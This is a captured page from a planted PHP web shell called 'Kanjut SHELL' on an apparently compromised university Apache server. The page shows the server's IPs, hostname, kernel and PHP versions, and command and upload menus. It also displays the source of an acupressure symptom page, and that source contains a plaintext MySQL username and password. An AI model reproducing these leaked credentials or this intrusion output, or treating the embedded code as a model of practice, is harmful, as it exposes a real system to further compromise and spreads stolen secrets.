Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 3.133.152.189
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0705) :  /home/cngray/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/cngray/acupoints.php
<center>
<body bgcolor = "white">
<font size = "7" color = "blue"><b>
Displays All Symptoms and Points
</b>
</font>

<hr>
<font size = "5">
The table below shows all possible symptoms along witb all the steps that can be taken to relieve the symptom. When starting to list your symptoms always start
with the least painful then progress to the most painful. The name of the symptoms will be found on the far left of the table followed by the list of rememdies to relieve
the problem to its right. By clicking on a rememdy you will be directed to a webpage that shows you where to apply pressure.<p>

<center>
<font size = 4>
<?php

        $host = 'localhost';
        $user = 'jdwhitehurst';
        $passwd = 'vwccsjdwhitehurst';
        $database = 'jdwhitehurst';

        $connect = mysql_connect($host, $user, $passwd);
        $query = "select * from POINTS";

        mysql_select_db($database);
        $result_id = mysql_query($query, $connect);
	
	
        if($result_id)
        {
                print '<table border=1>';
                print '<TH> SYMPTOM <TH> REMEDIES';
                while($row = mysql_fetch_assoc($result_id))
                {      
			 print '<TR>';
			 print "<td>".$row['SYMPTOM']. "</td>";
			 print "<td><a href =".$row["REMEDIES"]."> Show remedy for symptom </a></td>";
		         print '</TR>';
                }
        }
        else
                print "Fail.<p>";
	
        mysql_close($connect);
?>
</font>
</center>
<p>


<A HREF = acupres.html style = "color : black"> Main Page</a><p>


Stv3n404 - 2023